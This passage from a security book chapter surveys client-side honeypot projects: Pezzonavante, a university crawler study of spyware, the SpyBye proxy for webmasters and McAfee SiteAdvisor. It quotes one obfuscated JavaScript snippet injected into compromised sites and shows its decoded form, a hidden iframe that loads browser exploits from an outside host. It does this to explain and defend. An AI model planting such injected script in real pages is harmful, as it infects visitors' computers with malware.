In this section, we take a look at some other approaches to build a client-side honeypot. We give an overview of different projects in this area and present some of the lessons learned with the help of them. Some of these projects have an academic background, and some are commercial products.
We start with a brief overview of a high-interaction client honeypot called Pezzonavante by Danford. This tool used a hybrid, asynchronous approach to detect whether the client honeypot is compromised. It used security tools to scan for malware on the system, correlated Snort network IDS alerts, compared system snapshots, and also closely analyzed the network traffic. The whole project is unfortunately not publicly available, but Danford presents his deployment experience in a presentation [18]:
In a period between October 2005 and March 2006, 200,000 URLs were surfed.
More than 750 spyware-related events could be observed.
About 1500 malware samples could be collected.
More than 500 malicious URLs could be detected and takedown requests were submitted.
In the following, we present some other projects in the area of client honeypots and their results.
We start with a closer look at a low-interaction client-side honeypot. In a paper entitled "A Crawler-Based Study of Spyware on the Web," several researchers from the Department of Science and Engineering at the University of Washington present their project results [57]. They tried to answer the following questions:
How much spyware is on the Internet?
Where is that spyware located (e.g., game sites, children's sites, adult sites, etc.)?
How likely is a user to encounter spyware through random browsing?
What fraction of executables on the Internet are infected with spyware?
What fraction of web pages infect victims through scripted, drive-by download attacks?
How is the spyware threat changing over time?
Their approach is very similar to the one we presented earlier. The basic idea is to use the web crawler Heritrix to investigate a large amount of the World Wide Web. Executables files are then downloaded and installed within a virtual machine. In an analysis phase, it is determined whether this executable caused a spyware infection.
We introduced Heritrix in the beginning of this chapter, and you can find more information about it at http://crawler.archive.org/. To start a web crawl, Heritrix uses a so-called seed, which is a collection of URLs from which Heritrix starts its searchs and begins the actual crawling. In this study, the seed is generated with two different approaches: the Google directory, a collection of links sorted by different categories, and keyword searches on Google itself. To differentiate between different users, they base the two approaches in eight different categories: adult entertainment sites, celebrity-oriented sites, games-oriented sites, kids' sites, music sites, online news, pirate/warez sites, and screensaver or wallpaper sites. This results in several seeds that are then fed to Heritrix. The web crawler examines the sites to a depth of three links, restricting the search to pages hosted on the same domain. This resulted in a thorough coverage of individual sites with breadth across many sites. On average, 6577 pages were crawled per site. Since many websites host downloadable executables on a separate web server, the crawler was also allowed to download executables linked from the seed site but hosted on a different server.
Two different heuristics are used to detect whether a given file is executable:
These two heuristics help to determine whether a given file is executable. Since their study is focused on spyware, they may miss certain kinds of attacks — for example, the IFRAME vulnerability discussed in Section 8.1.1 and associated infections cannot be easily detected with this approach. But these heuristics should not lead to false positives; in other words, all downloaded files should also be executables. To improve the detection rate, they also downloaded archives like ZIP files and examined whether these contained executables. Moreover, JavaScript within HTML files was examined for additional URLs. As you can see, there are many possibilities when designing such a study.
To analyze the downloaded executable, they install it within a virtual machine. This virtual machine is used as a quick way to revert from an infected to a clean state. If the executable is malicious, it will change certain parts of the operating system and, for example, automatically start itself upon reboot. Hence, it is necessary to quickly revert all changes caused by the execution of the file. The easiest way to do this is to use a virtual machine — for example, VMware, which we introduced in Chapter 2. With the snapshot and revert function of VMware, it takes only a couple of seconds to undo all changes and have a clean system again.
In addition, they put a lot of effort in the installation phase of the downloaded executables. Most of the time the installation process requires certain user interaction — for example, the user has to accept the license agreement, he has to select the installation path, or he must click on the Finish button to end the installation process. To automate the installation, they developed a framework to automate these tasks. The resulting tool can click on common permission-granting buttons such as Next, OK, or I agree, identify and select common radio buttons or check boxes, and fill out type-in boxes that prompt the user for personal information. As a result, the installation process with most of the common installation frameworks can be automated.
Once the executable is installed, the last step of this study was to determine whether the executable is actually some type of spyware. To answer this question, they use the antispyware tool AdAware by Lavasoft (http://www.lavasoftusa.com/). This tool is installed within the virtual machine, and once the installation process of the downloaded file is finished, AdAware is automatically started. AdAware searches the filesystem, registry, and other parts of the operating system for suspicious entries and tries to identify which kind of malware is installed on the system. It reports its findings, and this report is automatically analyzed in this study. With additional manual effort, the type of infection (e.g., keylogger, adware, Trojan backdoor, or browser hijacking) is determined. The main drawback of this approach is that it will only identify spyware for which AdAware has signatures. This means that not all spyware files will be identified as such, and it is hard to determine the false negative rate. As a result, the findings of the study are a lower bound of the actual spyware, which can be found on the World Wide Web.
To learn more about the changing threat of client-side attacks, the whole measurement was conducted twice: The first run was carried out in May 2005 and then again five months later in October 2005. This allows us to compare both runs and create a comparison in time.
For the first study in May 2005, the researchers crawled 18 million URLs and found spyware in 13.4 percent of the 21,200 executables they identified. At the same time, they found scripted drive-by download attacks in 5.9 percent of the processed web pages. The results dropped for the second study in October 2005. At that point, they crawled almost 22 million URLs but found "only" 1294 infected executables, which are about 5.5 percent of the 23,694 executables identified. This rather large drop is mainly caused by one single site whose number of infected executables declined from 1776 in May to 503 in October.
In both crawls, they found executable files in approximately 19 percent of all crawled websites and spyware-infected executables in about 4 percent of the sites. Overall, they found that as of October 2005, approximately 1 in 20 of the executable files crawled contained spyware, an indication of the extent of the spyware problem. The only positive result of the study is that the number of unique spyware programs is rather low. They could only identify 82 and 89 unique versions, respectively.
Another result is that spyware appears on a small, but nonnegligible fraction of the Internet websites that were crawled. In the first crawl, 3.8 percent of infected domains could be identified, whereas this number was slightly higher, with 4.4 percent in October 2005. The distribution of spyware on domains follows the usual scheme. While some sites offer a large number of infected executables, most just offer a handful.
Based on the different categories to search for malicious content, the study can also identify suspicious parts of the Internet. The results shows that the most high-risk category is websites related to games. Approximately 60 percent of all sites in this category contain executable content, which presumably consists of free games or game demos available for download. Though only a small fraction of these executables contain spyware (5.6 percent), one in five game sites include spyware programs. Another high-risk category is the one related to celebrity, for which over one in seven executables are infected with spyware.
More detailed information and many additional statistics about this study can be found in the paper by Moshchuk et al. [57].
Many web pages that attempt to compromise unsuspecting visitors and install malware do so without the knowledge of the web master responsible for the pages. The proliferation of easy-to-install web applications, such as phpBB2, has resulted in a large number of web servers that are vulnerable to remote exploitation. Although it is easy to install these web applications, it is not as easy to fix their security vulnerabilities, and there are many of them. To get control of as many machines as possible, adversaries have taken a new approach. They scan the Internet for such vulnerable web applications and compromise them to install Javascript or iframes to compromise any visitors to these sites. Here is a common example on how the web page might look after it was compromised:
<script language="JavaScript">e = '0x00' + '5F'; str1 = "%E4%BC%B7%AA%C0%AD%AC%A7%B4%BB%E3%FE%AA%B7%AD%B7%BE%B7%B4%B7%AC% \ A7%E6%B8%B7%BC%BC%BB%B2%FE%E2%E4%B7%BA%AE%BF%B3%BB%C0%AD%AE%BD%E3%FE%B8% \ AC%AC%B0%E6%F1%F1%B0%AE%BF%BC%B1%E9%F2%BD%B1%B3%F1%AC%AE%BA%F1%FE%C0%A9%\ B7%BC%AC% B8%E3%EF%C0%B8%BB%B7%B9%B8%AC%E3%EF%E2%E4%F1%B7%BA%AE%BF%B3%BB%\ E2%E4%F1%BC%B7%AA%E2";str=tmp='';for(i=0;i<str1.length;i+=3){tmp = unescape(str1.slice(i,i+3)); str=str+String.fromCharCode((tmp.charCodeAt(0)^e)-127); }document.write(str);</script> |
Although this snippet of Javascript might not make much sense to us, our web browser will evaluate it to strip the obfuscation and get this content instead:
<div style="visibility:hidden"> <iframe src="http://prado7.com/trf/" width=1 height=1></iframe></div>
The iframe is responsible for fetching code that tries to exploit the web browser that visits the compromised website. If the exploit is successful, malware and other nasty software is downloaded on the user's computer. Unfortunately, finding this kind of code on your own website can be somewhat difficult. To help web masters in general, one of the authors created SpyBye, a tool that helps web masters determine if their web pages have been compromised to install malware.
SpyBye itself does not do very much because it relies mostly on your very own browser to do the interesting work. SpyBye operates as a proxy server and gets to see all the web fetches that your browser makes as a result of visiting a web page. SpyBye applies very simple rules to each URL that is fetched and classifies a URL into three categories: harmless, unknown, or dangerous. Although there is a great margin of error, the categories allow a web master to look at the URLs and determine if they should be there. If you see that a URL is being fetched that you would not expect, it's a good indication that you have been compromised. In addition to applying heuristics for determining if a site is potentially malicious, SpyBye also scans all fetched content for malware/spyware using the open source virus scanner ClamAV.
You must follow these steps to install your own SpyBye proxy:
1. | |
2. | |
3. | Configure, compile, and install libevent by executing the following commands in the libevent directory: ./configure && make && sudo make install. |
4. | Configure, compile, and install SpyBye by executing the following commands in the SpyBye directory: ./configure && make && sudo make install. |
If these instructions seem too complicated, you can just use the SpyBye proxy running at www.spybye.org:8080.
You need to figure out on which host and which port you want to run SpyBye. If you don't plan on running it permanently, you probably want to install it locally. Run the following command: spybye -p 8080. At this point, you should see output like the following:
SpyBye 0.2 starting up ... Loaded 90345 signatures Virus scanning enabled Report sharing enabled. Making connection to www.monkey.org:80 for /~provos/good_patterns Received 529 bytes from http//www.monkey.org/~provos/good_patterns Added 30 good patterns Making connection to www.monkey.org:80 for /~provos/bad_patterns Received 3240 bytes from http//www.monkey.org/~provos/bad_patterns Added 200 bad patterns Starting web server on port 8080 Configure your browser to use this server as proxy |
Now, configure your web browser to use 127.0.0.1:8080 as an HTML proxy server. This instructs your web browser to send all its requests to SpyBye. At this point, you can no longer browse the web regularly. All requests are routed via the SpyBye proxy.
To start, go to http://spybye/. If everything worked, you should see a little status header and a form field in which you can enter a URL. Try to enter the URL for a site you want to check.
SpyBye classifies URLs into three different categories to assist with the analysis of a web page.
Harmless: A URL that originates from your website or is matched by a pattern in the good patterns file.
Unknown: A URL that did not originate with your website. This is likely to be third-party provided content and could be dangerous. If you see an unknown URL that you do not recognize, something might be wrong with your website.
Dangerous: A URL with a high likelihood of being dangerous. This is usually an indication that your website has been compromised. You should check if all your web applications have the latest security patches installed, and you might also have to reinstall your web server. Attackers usually leave backdoors that give them remote access to your site, even after you have removed potential exploits from your web pages.
You might be wondering why you should visit a potentially dangerous web page with your browser if it could potentially cause harm to your computer. SpyBye attempts to limit the damage a malicious site can cause by not forwarding any content that has been deemed dangerous. Unfortunately, no system is perfect. We recommend that you run the browser that is talking to SpyBye in its own virtual machine. That way you can just revert to a clean snapshot when you are done with the evaluation.
A commercial approach from this area is implemented by McAfee SiteAdvisor (http://www.siteadvisor.com/). The approach by SiteAdvisor is also a low-interaction variant of the client-side honeypot approach. Again, the idea is to download large parts of the Internet and then check whether they are malicious. For example, the project checks for exploits contained in the website or downloads that are spyware, adware, or other kinds of malware. Moreover, it checks whether the site contains links to other malicious websites or pop-ups. An interesting feature is the checking for e-mail abuses. If a form is found that lets you register to the site, this form is filled out automatically with a site-specific e-mail address, and all possible spam arriving at that e-mail address is closely monitored. You can think of this mechanism as a kind of honeytoken that checks whether the e-mail address is abused.
You can use the results published by SiteAdvisor to enhance your own browsing experience. Visit the website http://www.siteadvisor.com/, click on the "Download" link, and then download the autodetected plug-in for your web browser. The system requirements for this tool are as follows:
Operating System: Windows 98/ME/2000/XP, Linux, and Mac OS X
Minimum Hardware: 400Mhz processor, 128MB RAM, 5MB free disk space, and an Internet connection
At this point, only Mozilla Firefox and Internet Explorer are supported, so if you use another web browser, you cannot use this service. To install the appropriate plug-in, simply click on the downloaded file and follow the on-screen instructions. Once you have restarted your browser, you can instantly benefit from the results SiteAdvisor has collected. You now have a new toolbar in your browser that gives you information about the status of the current website. For example, it will mark suspicious pages returned via search engine queries with a red cross to indicate that you should not visit such a website. Currently, it supports Google, Yahoo!, and MSN. As another example: When you browse the World Wide Web, a small button on your browser toolbar changes color based on SiteAdvisor's safety results. Once this toolbar turns red, you should be very suspicious, since the current website is rated as malicious by SiteAdvisor.
With these features you can browse the Web in a safer way, and your chances of getting infected via malicious websites and drive-by downloads are reduced. A very interesting feature of SiteAdvisor is the ability to track relationships between different websites. Imagine that site A is rated suspicious and site B includes a link to A. Since there is a relation between these sites, the rating of site B will be slightly lowered. Based on these data, it is possible to detect dangerous parts of the Internet, which should not be visited by an Internet user without protection and an unpatched system.
Some interesting results are also published by SiteAdvisor that deal with the (in)security of search engines. In a study from May 2006, they used more than 1300 popular keywords from different areas and tested the five most prevalent search engines. They examined the first five pages of results for each keyword with the SiteAdvisor methodology just described and calculated the safety rating accordingly. To quote their results: "Overall, MSN search results had the lowest percentage (3.9 percent) of dangerous sites while Ask search results had the highest percentage (6.1 percent). Google was in between (5.3 percent)."[1]
[1] http://www.siteadvisor.com/studies/search_safety_may2006.html.
Besides the preceding honeypot solutions, there are also some possibilities for further research in this area. For example, passive client-side honeypots are an area where not much research and development have been done yet. The following research can, for example, be considered:
IRC-based honeyclients that join a specific IRC server and channel (e.g., #warez, #1337). Then they just idle in this channel or throw in random quotes. This can help determine whether an IRC user is subject to more attacks.
Instant messenger-based honeyclients (e.g., AIM, ICQ, MSN ...) that connect to the network and interpret received messages. This can be used to learn more about bots that spread via instant message networks and malicious users that distribute malicious links.
Mail-based honeyclients that download e-mails and check whether this e-mail is malicious. In addition, such a client-side honeypot can analyze the content of the e-mail and follow embedded links (thus being very similar to web-based honeyclients). Presumably this kind of e-mail contains significantly more malicious content.
Peer-to-peer (P2P) based honeyclients that randomly download files from P2P-networks and execute it. Since we know that malware uses this propagation mechanism, it is worth exploring it. Several academic studies showed that malware in P2P systems is common [45,79].
Again, these types of honeypots must regularly check their own consistency and detect changes. This way, they can notice if they were exploited by malicious servers or other attackers.
There are many possible ways for different antihoneyclient techniques. For example, an adversary could blacklist known honeypot operators, use anticrawling techniques or trigger the actual exploits after a timeout of a couple of minutes. Danford gives an excellent overview of the research challenges in this area [18].